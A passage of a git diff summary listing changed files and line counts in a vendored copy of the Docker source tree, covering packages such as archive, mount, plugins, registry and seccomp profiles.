 .../docker/docker/man/docker-top.1.md         |   36 -
 .../docker/docker/man/docker-unpause.1.md     |   28 -
 .../docker/docker/man/docker-update.1.md      |  171 -
 .../docker/docker/man/docker-version.1.md     |   62 -
 .../docker/docker/man/docker-wait.1.md        |   30 -
 .../github.com/docker/docker/man/docker.1.md  |  237 -
 .../github.com/docker/docker/man/dockerd.8.md |  710 --
 .../github.com/docker/docker/man/generate.go  |   43 -
 .../github.com/docker/docker/man/generate.sh  |   15 -
 .../github.com/docker/docker/man/glide.lock   |   52 -
 .../github.com/docker/docker/man/glide.yaml   |   12 -
 .../docker/docker/man/md2man-all.sh           |   22 -
 .../docker/docker/migrate/v1/migratev1.go     |   41 +-
 .../docker/migrate/v1/migratev1_test.go       |   31 +-
 .../oci/{defaults_linux.go => defaults.go}    |  129 +-
 .../docker/docker/oci/defaults_solaris.go     |   20 -
 .../docker/docker/oci/defaults_windows.go     |   19 -
 .../docker/docker/oci/devices_linux.go        |   20 +-
 .../docker/docker/oci/devices_unsupported.go  |    6 +-
 .../docker/docker/oci/namespaces.go           |   13 +-
 .../docker/docker/opts/address_pools.go       |   84 +
 .../docker/docker/opts/address_pools_test.go  |   20 +
 vendor/github.com/docker/docker/opts/env.go   |   48 +
 .../github.com/docker/docker/opts/env_test.go |  124 +
 vendor/github.com/docker/docker/opts/hosts.go |   30 +-
 .../docker/docker/opts/hosts_test.go          |   39 +-
 .../docker/docker/opts/hosts_unix.go          |    2 +-
 .../docker/docker/opts/hosts_windows.go       |    4 +-
 vendor/github.com/docker/docker/opts/ip.go    |    4 +-
 .../github.com/docker/docker/opts/ip_test.go  |    2 +-
 vendor/github.com/docker/docker/opts/mount.go |  171 -
 .../docker/docker/opts/mount_test.go          |  184 -
 vendor/github.com/docker/docker/opts/opts.go  |  159 +-
 .../docker/docker/opts/opts_test.go           |   50 +-
 .../docker/docker/opts/opts_unix.go           |    4 +-
 .../docker/docker/opts/opts_windows.go        |    4 +-
 vendor/github.com/docker/docker/opts/port.go  |  146 -
 .../docker/docker/opts/port_test.go           |  259 -
 .../docker/docker/opts/quotedstring.go        |    4 +-
 .../docker/docker/opts/quotedstring_test.go   |   20 +-
 .../docker/{runconfig => }/opts/runtime.go    |    2 +-
 .../github.com/docker/docker/opts/secret.go   |  107 -
 .../docker/docker/opts/secret_test.go         |   79 -
 .../docker/{runconfig => }/opts/ulimit.go     |   26 +-
 .../{runconfig => }/opts/ulimit_test.go       |    2 +-
 vendor/github.com/docker/docker/pkg/README.md |    6 +-
 .../docker/docker/pkg/aaparser/aaparser.go    |   16 +-
 .../docker/pkg/aaparser/aaparser_test.go      |    2 +-
 .../docker/docker/pkg/archive/archive.go      |  562 +-
 .../docker/pkg/archive/archive_linux.go       |   13 +-
 .../docker/pkg/archive/archive_linux_test.go  |  105 +-
 .../docker/pkg/archive/archive_other.go       |    2 +-
 .../docker/docker/pkg/archive/archive_test.go |  342 +-
 .../docker/docker/pkg/archive/archive_unix.go |   54 +-
 .../docker/pkg/archive/archive_unix_test.go   |  233 +-
 .../docker/pkg/archive/archive_windows.go     |   27 +-
 .../pkg/archive/archive_windows_test.go       |    6 +-
 .../docker/docker/pkg/archive/changes.go      |   17 +-
 .../docker/pkg/archive/changes_linux.go       |   13 +-
 .../docker/pkg/archive/changes_other.go       |    2 +-
 .../docker/pkg/archive/changes_posix_test.go  |    9 +-
 .../docker/docker/pkg/archive/changes_test.go |  314 +-
 .../docker/docker/pkg/archive/changes_unix.go |    9 +-
 .../docker/pkg/archive/changes_windows.go     |    8 +-
 .../docker/docker/pkg/archive/copy.go         |   68 +-
 .../docker/docker/pkg/archive/copy_unix.go    |    2 +-
 .../docker/pkg/archive/copy_unix_test.go      |  116 +-
 .../docker/docker/pkg/archive/copy_windows.go |    2 +-
 .../docker/docker/pkg/archive/diff.go         |   41 +-
 .../docker/docker/pkg/archive/diff_test.go    |    2 +-
 .../docker/pkg/archive/example_changes.go     |    2 +-
 .../docker/docker/pkg/archive/time_linux.go   |    4 +-
 .../docker/pkg/archive/time_unsupported.go    |    2 +-
 .../docker/docker/pkg/archive/utils_test.go   |    2 +-
 .../docker/docker/pkg/archive/whiteouts.go    |    2 +-
 .../docker/docker/pkg/archive/wrap.go         |    2 +-
 .../docker/docker/pkg/archive/wrap_test.go    |   20 +-
 .../docker/docker/pkg/authorization/api.go    |    4 +-
 .../docker/pkg/authorization/api_test.go      |   76 +
 .../docker/docker/pkg/authorization/authz.go  |   19 +-
 .../pkg/authorization/authz_unix_test.go      |   64 +-
 .../docker/pkg/authorization/middleware.go    |   40 +-
 .../pkg/authorization/middleware_test.go      |   53 +
 .../pkg/authorization/middleware_unix_test.go |   66 +
 .../docker/docker/pkg/authorization/plugin.go |   22 +-
 .../docker/pkg/authorization/response.go      |   17 +-
 .../docker/pkg/broadcaster/unbuffered.go      |    2 +-
 .../docker/pkg/broadcaster/unbuffered_test.go |    3 +-
 .../docker/pkg/chrootarchive/archive.go       |   52 +-
 .../docker/pkg/chrootarchive/archive_test.go  |   71 +-
 .../docker/pkg/chrootarchive/archive_unix.go  |    4 +-
 .../pkg/chrootarchive/archive_windows.go      |    2 +-
 .../docker/pkg/chrootarchive/chroot_linux.go  |   29 +-
 .../docker/pkg/chrootarchive/chroot_unix.go   |    8 +-
 .../docker/docker/pkg/chrootarchive/diff.go   |    2 +-
 .../docker/pkg/chrootarchive/diff_unix.go     |    4 +-
 .../docker/pkg/chrootarchive/diff_windows.go  |    4 +-
 .../docker/pkg/chrootarchive/init_unix.go     |    2 +-
 .../docker/pkg/chrootarchive/init_windows.go  |    2 +-
 .../docker/docker/pkg/containerfs/archiver.go |  203 +
 .../docker/pkg/containerfs/containerfs.go     |   87 +
 .../pkg/containerfs/containerfs_unix.go       |   10 +
 .../pkg/containerfs/containerfs_windows.go    |   15 +
 .../docker/pkg/devicemapper/devmapper.go      |   96 +-
 .../docker/pkg/devicemapper/devmapper_log.go  |   99 +-
 .../pkg/devicemapper/devmapper_wrapper.go     |   35 +-
 .../devicemapper/devmapper_wrapper_dynamic.go |    6 +
 ...mapper_wrapper_dynamic_deferred_remove.go} |    9 +-
 ...r_wrapper_dynamic_dlsym_deferred_remove.go |  128 +
 .../devmapper_wrapper_no_deferred_remove.go   |    8 +-
 .../docker/docker/pkg/devicemapper/ioctl.go   |   11 +-
 .../docker/docker/pkg/devicemapper/log.go     |    2 +-
 .../docker/docker/pkg/directory/directory.go  |    2 +-
 .../docker/pkg/directory/directory_test.go    |   17 +-
 .../docker/pkg/directory/directory_unix.go    |   16 +-
 .../docker/pkg/directory/directory_windows.go |   13 +-
 .../docker/docker/pkg/discovery/README.md     |    6 +-
 .../docker/docker/pkg/discovery/backends.go   |    4 +-
 .../docker/docker/pkg/discovery/discovery.go  |    2 +-
 .../docker/pkg/discovery/discovery_test.go    |    2 +-
 .../docker/docker/pkg/discovery/entry.go      |    2 +-
 .../docker/docker/pkg/discovery/file/file.go  |    2 +-
 .../docker/pkg/discovery/file/file_test.go    |    2 +-
 .../docker/docker/pkg/discovery/generator.go  |    2 +-
 .../docker/pkg/discovery/generator_test.go    |    2 +-
 .../docker/docker/pkg/discovery/kv/kv.go      |    4 +-
 .../docker/docker/pkg/discovery/kv/kv_test.go |    4 +-
 .../docker/pkg/discovery/memory/memory.go     |    2 +-
 .../pkg/discovery/memory/memory_test.go       |    2 +-
 .../docker/pkg/discovery/nodes/nodes.go       |    2 +-
 .../docker/pkg/discovery/nodes/nodes_test.go  |    2 +-
 .../docker/docker/pkg/dmesg/dmesg_linux.go    |   18 +
 .../docker/pkg/dmesg/dmesg_linux_test.go      |    9 +
 .../docker/pkg/filenotify/filenotify.go       |    2 +-
 .../docker/docker/pkg/filenotify/fsnotify.go  |    4 +-
 .../docker/docker/pkg/filenotify/poller.go    |   12 +-
 .../docker/pkg/filenotify/poller_test.go      |    6 +-
 .../docker/docker/pkg/fileutils/fileutils.go  |  209 +-
 .../docker/pkg/fileutils/fileutils_darwin.go  |    2 +-
 .../docker/pkg/fileutils/fileutils_solaris.go |    7 -
 .../docker/pkg/fileutils/fileutils_test.go    |  142 +-
 .../docker/pkg/fileutils/fileutils_unix.go    |    4 +-
 .../docker/pkg/fileutils/fileutils_windows.go |    2 +-
 .../docker/pkg/fsutils/fsutils_linux.go       |   23 +-
 .../docker/pkg/fsutils/fsutils_linux_test.go  |    9 +-
 .../docker/docker/pkg/gitutils/gitutils.go    |  100 -
 .../docker/pkg/gitutils/gitutils_test.go      |  220 -
 .../docker/pkg/graphdb/conn_sqlite3_linux.go  |   19 -
 .../docker/pkg/graphdb/graphdb_linux.go       |  551 --
 .../docker/pkg/graphdb/graphdb_linux_test.go  |  721 --
 .../docker/docker/pkg/graphdb/sort_linux.go   |   27 -
 .../docker/pkg/graphdb/sort_linux_test.go     |   29 -
 .../docker/docker/pkg/graphdb/unsupported.go  |    3 -
 .../docker/docker/pkg/graphdb/utils_linux.go  |   32 -
 .../docker/pkg/homedir/homedir_linux.go       |   21 +
 .../docker/pkg/homedir/homedir_others.go      |   13 +
 .../docker/docker/pkg/homedir/homedir_test.go |    2 +-
 .../homedir/{homedir.go => homedir_unix.go}   |   13 +-
 .../docker/pkg/homedir/homedir_windows.go     |   24 +
 .../docker/docker/pkg/httputils/httputils.go  |   56 -
 .../docker/pkg/httputils/httputils_test.go    |  115 -
 .../docker/pkg/httputils/mimetype_test.go     |   13 -
 .../docker/docker/pkg/idtools/idtools.go      |  149 +-
 .../docker/docker/pkg/idtools/idtools_unix.go |   53 +-
 .../docker/pkg/idtools/idtools_unix_test.go   |  224 +-
 .../docker/pkg/idtools/idtools_windows.go     |    8 +-
 .../docker/pkg/idtools/usergroupadd_linux.go  |    2 +-
 .../pkg/idtools/usergroupadd_unsupported.go   |    2 +-
 .../docker/docker/pkg/idtools/utils_unix.go   |    2 +-
 .../docker/pkg/integration/cmd/command.go     |  294 -
 .../pkg/integration/cmd/command_test.go       |  118 -
 .../docker/docker/pkg/integration/utils.go    |  227 -
 .../docker/pkg/integration/utils_test.go      |  363 -
 .../docker/docker/pkg/ioutils/buffer.go       |    2 +-
 .../docker/docker/pkg/ioutils/buffer_test.go  |   80 +-
 .../docker/docker/pkg/ioutils/bytespipe.go    |    2 +-
 .../docker/pkg/ioutils/bytespipe_test.go      |    2 +-
 .../docker/docker/pkg/ioutils/fmt.go          |   22 -
 .../docker/docker/pkg/ioutils/fmt_test.go     |   17 -
 .../docker/docker/pkg/ioutils/fswriters.go    |    2 +-
 .../docker/pkg/ioutils/fswriters_test.go      |    6 +-
 .../docker/docker/pkg/ioutils/readers.go      |   15 +-
 .../docker/docker/pkg/ioutils/readers_test.go |   15 +-
 .../docker/docker/pkg/ioutils/temp_unix.go    |    2 +-
 .../docker/docker/pkg/ioutils/temp_windows.go |    4 +-
 .../docker/docker/pkg/ioutils/writeflusher.go |    2 +-
 .../docker/docker/pkg/ioutils/writers.go      |    2 +-
 .../docker/docker/pkg/ioutils/writers_test.go |    2 +-
 .../docker/docker/pkg/jsonlog/jsonlog.go      |   42 -
 .../docker/pkg/jsonlog/jsonlog_marshalling.go |  178 -
 .../pkg/jsonlog/jsonlog_marshalling_test.go   |   34 -
 .../docker/pkg/jsonlog/jsonlogbytes_test.go   |   39 -
 .../docker/pkg/jsonlog/time_marshalling.go    |   27 -
 .../pkg/jsonlog/time_marshalling_test.go      |   47 -
 .../docker/pkg/jsonmessage/jsonmessage.go     |  182 +-
 .../pkg/jsonmessage/jsonmessage_test.go       |  195 +-
 .../docker/pkg/listeners/listeners_solaris.go |   31 -
 .../docker/docker/pkg/locker/README.md        |   10 +-
 .../docker/docker/pkg/locker/locker.go        |    2 +-
 .../docker/docker/pkg/locker/locker_test.go   |   39 +-
 .../docker/docker/pkg/longpath/longpath.go    |    2 +-
 .../docker/pkg/longpath/longpath_test.go      |    2 +-
 .../docker/pkg/loopback/attach_loopback.go    |   10 +-
 .../docker/docker/pkg/loopback/ioctl.go       |   29 +-
 .../docker/pkg/loopback/loop_wrapper.go       |    4 +-
 .../docker/docker/pkg/loopback/loopback.go    |   15 +-
 .../docker/docker/pkg/mount/flags.go          |    2 +-
 .../docker/docker/pkg/mount/flags_freebsd.go  |    3 +-
 .../docker/docker/pkg/mount/flags_linux.go    |   50 +-
 .../docker/pkg/mount/flags_unsupported.go     |    5 +-
 .../docker/docker/pkg/mount/mount.go          |  129 +-
 .../docker/pkg/mount/mount_unix_test.go       |   14 +-
 .../docker/pkg/mount/mounter_freebsd.go       |    7 +-
 .../docker/docker/pkg/mount/mounter_linux.go  |   54 +-
 .../docker/pkg/mount/mounter_linux_test.go    |  228 +
 .../docker/pkg/mount/mounter_solaris.go       |   33 -
 .../docker/pkg/mount/mounter_unsupported.go   |    4 +-
 .../docker/docker/pkg/mount/mountinfo.go      |    2 +-
 .../docker/pkg/mount/mountinfo_freebsd.go     |   18 +-
 .../docker/pkg/mount/mountinfo_linux.go       |  153 +-
 .../docker/pkg/mount/mountinfo_linux_test.go  |  156 +-
 .../docker/pkg/mount/mountinfo_solaris.go     |   37 -
 .../docker/pkg/mount/mountinfo_unsupported.go |    6 +-
 .../docker/pkg/mount/mountinfo_windows.go     |    4 +-
 .../docker/pkg/mount/sharedsubtree_linux.go   |    4 +-
 .../pkg/mount/sharedsubtree_linux_test.go     |   23 +-
 .../docker/pkg/mount/sharedsubtree_solaris.go |   58 -
 .../cmd/names-generator/main.go               |    3 +
 .../pkg/namesgenerator/names-generator.go     |   69 +-
 .../namesgenerator/names-generator_test.go    |    2 +-
 .../docker/pkg/parsers/kernel/kernel.go       |    2 +-
 .../pkg/parsers/kernel/kernel_darwin.go       |    2 +-
 .../docker/pkg/parsers/kernel/kernel_unix.go  |   18 +-
 .../pkg/parsers/kernel/kernel_unix_test.go    |    2 +-
 .../pkg/parsers/kernel/kernel_windows.go      |   42 +-
 .../docker/pkg/parsers/kernel/uname_linux.go  |   16 +-
 .../pkg/parsers/kernel/uname_solaris.go       |    2 +-
 .../pkg/parsers/kernel/uname_unsupported.go   |    4 +-
 .../operatingsystem/operatingsystem_linux.go  |    2 +-
 .../operatingsystem_solaris.go                |   37 -
 .../operatingsystem/operatingsystem_unix.go   |    2 +-
 .../operatingsystem_unix_test.go              |    2 +-
 .../operatingsystem_windows.go                |   54 +-
 .../docker/docker/pkg/parsers/parsers.go      |    2 +-
 .../docker/docker/pkg/parsers/parsers_test.go |    2 +-
 .../docker/docker/pkg/pidfile/pidfile.go      |    9 +-
 .../docker/pkg/pidfile/pidfile_darwin.go      |   12 +-
 .../docker/docker/pkg/pidfile/pidfile_test.go |    2 +-
 .../docker/docker/pkg/pidfile/pidfile_unix.go |    2 +-
 .../docker/pkg/pidfile/pidfile_windows.go     |   12 +-
 .../docker/pkg/platform/architecture_linux.go |   12 +-
 .../docker/pkg/platform/architecture_unix.go  |    4 +-
 .../pkg/platform/architecture_windows.go      |    2 +-
 .../docker/docker/pkg/platform/platform.go    |    4 +-
 .../docker/pkg/platform/utsname_int8.go       |   18 -
 .../docker/pkg/platform/utsname_uint8.go      |   18 -
 .../docker/docker/pkg/plugingetter/getter.go  |   39 +-
 .../docker/docker/pkg/plugins/client.go       |   67 +-
 .../docker/docker/pkg/plugins/client_test.go  |  153 +-
 .../docker/docker/pkg/plugins/discovery.go    |   63 +-
 .../docker/pkg/plugins/discovery_test.go      |    4 +-
 .../docker/pkg/plugins/discovery_unix.go      |    2 +-
 .../docker/pkg/plugins/discovery_unix_test.go |  102 +-
 .../docker/pkg/plugins/discovery_windows.go   |    2 +-
 .../docker/docker/pkg/plugins/errors.go       |    2 +-
 .../docker/docker/pkg/plugins/plugin_test.go  |  114 +-
 .../pkg/plugins/pluginrpc-gen/README.md       |    2 +-
 .../pkg/plugins/pluginrpc-gen/fixtures/foo.go |    8 +-
 .../fixtures/otherfixture/spaceship.go        |    2 +-
 .../pkg/plugins/pluginrpc-gen/parser_test.go  |    2 +-
 .../docker/docker/pkg/plugins/plugins.go      |   12 +-
 .../docker/pkg/plugins/plugins_linux.go       |    7 -
 .../docker/docker/pkg/plugins/plugins_unix.go |    9 +
 .../docker/pkg/plugins/plugins_windows.go     |   11 +-
 .../docker/pkg/plugins/transport/http.go      |    2 +-
 .../docker/pkg/plugins/transport/http_test.go |   21 +
 .../docker/pkg/plugins/transport/transport.go |    2 +-
 .../docker/docker/pkg/pools/pools.go          |   33 +-
 .../docker/docker/pkg/pools/pools_test.go     |   28 +-
 .../docker/docker/pkg/progress/progress.go    |    7 +-
 .../docker/pkg/progress/progressreader.go     |    2 +-
 .../pkg/progress/progressreader_test.go       |    4 +-
 .../docker/docker/pkg/promise/promise.go      |   11 -
 .../docker/docker/pkg/pubsub/publisher.go     |   12 +-
 .../docker/pkg/pubsub/publisher_test.go       |   10 +-
 .../docker/docker/pkg/random/random.go        |   71 -
 .../docker/docker/pkg/random/random_test.go   |   22 -
 .../docker/docker/pkg/reexec/README.md        |    2 +-
 .../docker/docker/pkg/reexec/command_linux.go |    8 +-
 .../docker/docker/pkg/reexec/command_unix.go  |    4 +-
 .../docker/pkg/reexec/command_unsupported.go  |    6 +-
 .../docker/pkg/reexec/command_windows.go      |    4 +-
 .../docker/docker/pkg/reexec/reexec.go        |    2 +-
 .../docker/docker/pkg/reexec/reexec_test.go   |   52 +
 .../docker/docker/pkg/registrar/registrar.go  |  127 -
 .../docker/pkg/registrar/registrar_test.go    |  119 -
 .../docker/docker/pkg/signal/signal.go        |    4 +-
 .../docker/docker/pkg/signal/signal_darwin.go |    2 +-
 .../docker/pkg/signal/signal_freebsd.go       |    2 +-
 .../docker/docker/pkg/signal/signal_linux.go  |   73 +-
 .../docker/pkg/signal/signal_linux_test.go    |   59 +
 .../docker/pkg/signal/signal_solaris.go       |   42 -
 .../docker/docker/pkg/signal/signal_test.go   |   34 +
 .../docker/docker/pkg/signal/signal_unix.go   |    2 +-
 .../docker/pkg/signal/signal_unsupported.go   |    4 +-
 .../docker/pkg/signal/signal_windows.go       |    4 +-
 .../docker/pkg/signal/testfiles/main.go       |   43 +
 .../docker/docker/pkg/signal/trap.go          |   13 +-
 .../docker/pkg/signal/trap_linux_test.go      |   82 +
 .../docker/docker/pkg/stdcopy/stdcopy.go      |   20 +-
 .../docker/docker/pkg/stdcopy/stdcopy_test.go |   35 +-
 .../pkg/streamformatter/streamformatter.go    |  189 +-
 .../streamformatter/streamformatter_test.go   |  152 +-
 .../pkg/streamformatter/streamwriter.go       |   47 +
 .../pkg/streamformatter/streamwriter_test.go  |   35 +
 .../docker/docker/pkg/stringid/stringid.go    |   54 +-
 .../docker/pkg/stringid/stringid_test.go      |    2 +-
 .../docker/docker/pkg/stringutils/README.md   |    1 -
 .../docker/pkg/stringutils/stringutils.go     |  101 -
 .../pkg/stringutils/stringutils_test.go       |  121 -
 .../docker/docker/pkg/symlink/LICENSE.APACHE  |    2 +-
 .../docker/docker/pkg/symlink/LICENSE.BSD     |    2 +-
 .../docker/docker/pkg/symlink/fs.go           |    4 +-
 .../docker/docker/pkg/symlink/fs_unix.go      |    2 +-
 .../docker/docker/pkg/symlink/fs_unix_test.go |    2 +-
 .../docker/docker/pkg/symlink/fs_windows.go   |   22 +-
 .../docker/docker/pkg/sysinfo/numcpu.go       |    2 +-
 .../docker/docker/pkg/sysinfo/numcpu_linux.go |   11 +-
 .../docker/pkg/sysinfo/numcpu_windows.go      |    4 +-
 .../docker/docker/pkg/sysinfo/sysinfo.go      |    2 +-
 .../docker/pkg/sysinfo/sysinfo_linux.go       |   15 +-
 .../docker/pkg/sysinfo/sysinfo_linux_test.go  |   76 +-
 .../docker/pkg/sysinfo/sysinfo_solaris.go     |  121 -
 .../docker/docker/pkg/sysinfo/sysinfo_test.go |    2 +-
 .../docker/docker/pkg/sysinfo/sysinfo_unix.go |    6 +-
 .../docker/pkg/sysinfo/sysinfo_windows.go     |    4 +-
 .../docker/docker/pkg/system/chtimes.go       |   25 +-
 .../docker/docker/pkg/system/chtimes_test.go  |    2 +-
 .../docker/docker/pkg/system/chtimes_unix.go  |    2 +-
 .../docker/pkg/system/chtimes_unix_test.go    |    2 +-
 .../docker/pkg/system/chtimes_windows.go      |   23 +-
 .../docker/pkg/system/chtimes_windows_test.go |    2 +-
 .../docker/docker/pkg/system/errors.go        |    5 +-
 .../docker/pkg/system/events_windows.go       |   85 -
 .../docker/docker/pkg/system/exitcode.go      |   16 +-
 .../docker/docker/pkg/system/filesys.go       |   27 +-
 .../docker/pkg/system/filesys_windows.go      |  172 +-
 .../docker/docker/pkg/system/init.go          |   22 +
 .../docker/docker/pkg/system/init_unix.go     |    7 +
 .../docker/docker/pkg/system/init_windows.go  |   12 +
 .../docker/docker/pkg/system/lcow.go          |   69 +
 .../docker/docker/pkg/system/lcow_unix.go     |    8 +
 .../docker/docker/pkg/system/lcow_windows.go  |    6 +
 .../pkg/system/{lstat.go => lstat_unix.go}    |    2 +-
 .../docker/pkg/system/lstat_unix_test.go      |    2 +-
 .../docker/docker/pkg/system/lstat_windows.go |   17 +-
 .../docker/docker/pkg/system/meminfo.go       |    2 +-
 .../docker/docker/pkg/system/meminfo_linux.go |    2 +-
 .../docker/pkg/system/meminfo_solaris.go      |  128 -
 .../docker/pkg/system/meminfo_unix_test.go    |    2 +-
 .../docker/pkg/system/meminfo_unsupported.go  |    4 +-
 .../docker/pkg/system/meminfo_windows.go      |    2 +-
 .../docker/docker/pkg/system/mknod.go         |    8 +-
 .../docker/docker/pkg/system/mknod_windows.go |    4 +-
 .../docker/docker/pkg/system/path.go          |   60 +
 .../docker/docker/pkg/system/path_unix.go     |   14 -
 .../docker/docker/pkg/system/path_windows.go  |   37 -
 .../docker/pkg/system/path_windows_test.go    |   27 +-
 .../{utils => pkg/system}/process_unix.go     |   12 +-
 .../docker/pkg/system/process_windows.go      |   18 +
 .../github.com/docker/docker/pkg/system/rm.go |   80 +
 .../docker/docker/pkg/system/rm_test.go       |   84 +
 .../docker/docker/pkg/system/stat_darwin.go   |   25 +-
 .../docker/docker/pkg/system/stat_freebsd.go  |   18 +-
 .../docker/docker/pkg/system/stat_linux.go    |   22 +-
 .../docker/docker/pkg/system/stat_openbsd.go  |    8 +-
 .../docker/docker/pkg/system/stat_solaris.go  |   27 +-
 .../pkg/system/{stat.go => stat_unix.go}      |   20 +-
 .../docker/pkg/system/stat_unix_test.go       |    9 +-
 .../docker/pkg/system/stat_unsupported.go     |   17 -
 .../docker/docker/pkg/system/stat_windows.go  |   48 +-
 .../docker/docker/pkg/system/syscall_unix.go  |    6 +-
 .../docker/pkg/system/syscall_windows.go      |   42 +-
 .../docker/pkg/system/syscall_windows_test.go |    2 +-
 .../docker/docker/pkg/system/umask.go         |    6 +-
 .../docker/docker/pkg/system/umask_windows.go |    4 +-
 .../docker/pkg/system/utimes_freebsd.go       |   10 +-
 .../docker/docker/pkg/system/utimes_linux.go  |   15 +-
 .../docker/pkg/system/utimes_unix_test.go     |    2 +-
 .../docker/pkg/system/utimes_unsupported.go   |    2 +-
 .../docker/docker/pkg/system/xattrs_linux.go  |   50 +-
 .../docker/pkg/system/xattrs_unsupported.go   |    2 +-
 .../docker/docker/pkg/tailfile/tailfile.go    |    4 +-
 .../docker/pkg/tailfile/tailfile_test.go      |    2 +-
 .../docker/pkg/tarsum/builder_context.go      |    2 +-
 .../docker/pkg/tarsum/builder_context_test.go |    2 +-
 .../docker/docker/pkg/tarsum/fileinfosums.go  |   13 +-
 .../docker/pkg/tarsum/fileinfosums_test.go    |    6 +-
 .../docker/docker/pkg/tarsum/tarsum.go        |   26 +-
 .../docker/docker/pkg/tarsum/tarsum_test.go   |   45 +-
 .../docker/docker/pkg/tarsum/versioning.go    |   10 +-
 .../docker/pkg/tarsum/versioning_test.go      |    2 +-
 .../docker/docker/pkg/tarsum/writercloser.go  |    2 +-
 .../docker/docker/pkg/term/ascii.go           |    4 +-
 .../docker/docker/pkg/term/ascii_test.go      |   48 +-
 .../docker/docker/pkg/term/proxy.go           |   78 +
 .../docker/docker/pkg/term/proxy_test.go      |  115 +
 .../github.com/docker/docker/pkg/term/tc.go   |   20 +
 .../docker/docker/pkg/term/tc_linux_cgo.go    |   50 -
 .../docker/docker/pkg/term/tc_other.go        |   20 -
 .../docker/docker/pkg/term/tc_solaris_cgo.go  |   63 -
 .../github.com/docker/docker/pkg/term/term.go |    9 +-
 .../docker/docker/pkg/term/term_linux_test.go |  117 +
 .../docker/docker/pkg/term/term_solaris.go    |   41 -
 .../docker/docker/pkg/term/term_unix.go       |   29 -
 .../docker/docker/pkg/term/term_windows.go    |   53 +-
 .../docker/docker/pkg/term/termios_bsd.go     |   42 +
 .../docker/docker/pkg/term/termios_darwin.go  |   69 -
 .../docker/docker/pkg/term/termios_freebsd.go |   69 -
 .../docker/docker/pkg/term/termios_linux.go   |   42 +-
 .../docker/docker/pkg/term/termios_openbsd.go |   69 -
 .../docker/pkg/term/windows/ansi_reader.go    |    2 +-
 .../docker/pkg/term/windows/ansi_writer.go    |    2 +-
 .../docker/docker/pkg/term/windows/console.go |    2 +-
 .../docker/docker/pkg/term/windows/windows.go |    6 +-
 .../docker/pkg/term/windows/windows_test.go   |    2 +-
 .../docker/docker/pkg/term/winsize.go         |   20 +
 .../docker/pkg/testutil/assert/assert.go      |   97 -
 .../docker/docker/pkg/testutil/pkg.go         |    1 -
 .../docker/pkg/testutil/tempfile/tempfile.go  |   36 -
 .../docker/pkg/tlsconfig/tlsconfig_clone.go   |   11 -
 .../pkg/tlsconfig/tlsconfig_clone_go16.go     |   31 -
 .../pkg/tlsconfig/tlsconfig_clone_go17.go     |   33 -
 .../docker/pkg/truncindex/truncindex.go       |   14 +-
 .../docker/pkg/truncindex/truncindex_test.go  |   28 +-
 .../docker/docker/pkg/urlutil/urlutil.go      |   18 +-
 .../docker/docker/pkg/urlutil/urlutil_test.go |   24 +-
 .../docker/docker/pkg/useragent/useragent.go  |    2 +-
 .../docker/pkg/useragent/useragent_test.go    |    2 +-
 .../docker/docker/plugin/backend_linux.go     |  250 +-
 .../docker/plugin/backend_linux_test.go       |   81 +
 .../docker/plugin/backend_unsupported.go      |   11 +-
 .../docker/docker/plugin/blobstore.go         |   27 +-
 .../github.com/docker/docker/plugin/defs.go   |   30 +-
 .../github.com/docker/docker/plugin/errors.go |   66 +
 .../github.com/docker/docker/plugin/events.go |  111 +
 .../plugin/executor/containerd/containerd.go  |  175 +
 .../executor/containerd/containerd_test.go    |  148 +
 .../docker/docker/plugin/manager.go           |  229 +-
 .../docker/docker/plugin/manager_linux.go     |  149 +-
 .../docker/plugin/manager_linux_test.go       |  279 +
 .../docker/docker/plugin/manager_solaris.go   |   28 -
 .../docker/docker/plugin/manager_test.go      |   55 +
 .../docker/docker/plugin/manager_windows.go   |    6 +-
 .../github.com/docker/docker/plugin/store.go  |  132 +-
 .../docker/docker/plugin/store_test.go        |   41 +-
 .../docker/docker/plugin/v2/plugin.go         |   97 +-
 .../docker/docker/plugin/v2/plugin_linux.go   |   50 +-
 .../docker/plugin/v2/plugin_unsupported.go    |    4 +-
 .../docker/docker/plugin/v2/settable.go       |    2 +-
 .../docker/docker/plugin/v2/settable_test.go  |    4 +-
 vendor/github.com/docker/docker/poule.yml     |   55 +-
 .../docker/profiles/apparmor/apparmor.go      |   18 +-
 .../docker/profiles/apparmor/template.go      |    4 +-
 .../docker/profiles/seccomp/default.json      |   57 +-
 .../docker/docker/profiles/seccomp/seccomp.go |   46 +-
 .../profiles/seccomp/seccomp_default.go       |   50 +-
 .../docker/profiles/seccomp/seccomp_test.go   |    2 +-
 .../profiles/seccomp/seccomp_unsupported.go   |    5 +-
 .../github.com/docker/docker/project/ARM.md   |    6 +-
 .../{CONTRIBUTORS.md => CONTRIBUTING.md}      |    0
 .../docker/docker/project/GOVERNANCE.md       |  127 +-
 .../docker/docker/project/ISSUE-TRIAGE.md     |    6 +-
 .../project/PACKAGE-REPO-MAINTENANCE.md       |    2 +-
 .../docker/docker/project/PACKAGERS.md        |    2 +-
 .../docker/docker/project/README.md           |    2 +-
 .../docker/project/RELEASE-CHECKLIST.md       |  518 --
 .../docker/docker/project/RELEASE-PROCESS.md  |    2 +-
 .../docker/docker/project/REVIEWING.md        |    2 +-
 .../github.com/docker/docker/project/TOOLS.md |    2 +-
 .../docker/docker/reference/errors.go         |   25 +
 .../docker/docker/reference/reference.go      |  216 -
 .../docker/docker/reference/reference_test.go |  275 -
 .../docker/docker/reference/store.go          |  165 +-
 .../docker/docker/reference/store_test.go     |   72 +-
 .../github.com/docker/docker/registry/auth.go |   67 +-
 .../docker/docker/registry/auth_test.go       |    6 +-
 .../docker/docker/registry/config.go          |  235 +-
 .../docker/docker/registry/config_test.go     |  338 +-
 .../docker/docker/registry/config_unix.go     |   11 +-
 .../docker/docker/registry/config_windows.go  |    9 +-
 .../docker/docker/registry/endpoint_test.go   |    2 +-
 .../docker/docker/registry/endpoint_v1.go     |   16 +-
 .../docker/docker/registry/errors.go          |   31 +
 .../docker/docker/registry/registry.go        |   10 +-
 .../docker/registry/registry_mock_test.go     |   12 +-
 .../docker/docker/registry/registry_test.go   |  119 +-
 .../resumable}/resumablerequestreader.go      |   31 +-
 .../resumable}/resumablerequestreader_test.go |  142 +-
 .../docker/docker/registry/service.go         |   70 +-
 .../docker/docker/registry/service_v1.go      |    2 +-
 .../docker/docker/registry/service_v1_test.go |   15 +-
 .../docker/docker/registry/service_v2.go      |   16 +-
 .../docker/docker/registry/session.go         |   88 +-
 .../docker/docker/registry/types.go           |   11 +-
 .../docker/docker/reports/2017-05-01.md       |   35 +
 .../docker/docker/reports/2017-05-08.md       |   34 +
 .../docker/docker/reports/2017-05-15.md       |   52 +
 .../docker/docker/reports/2017-06-05.md       |   36 +
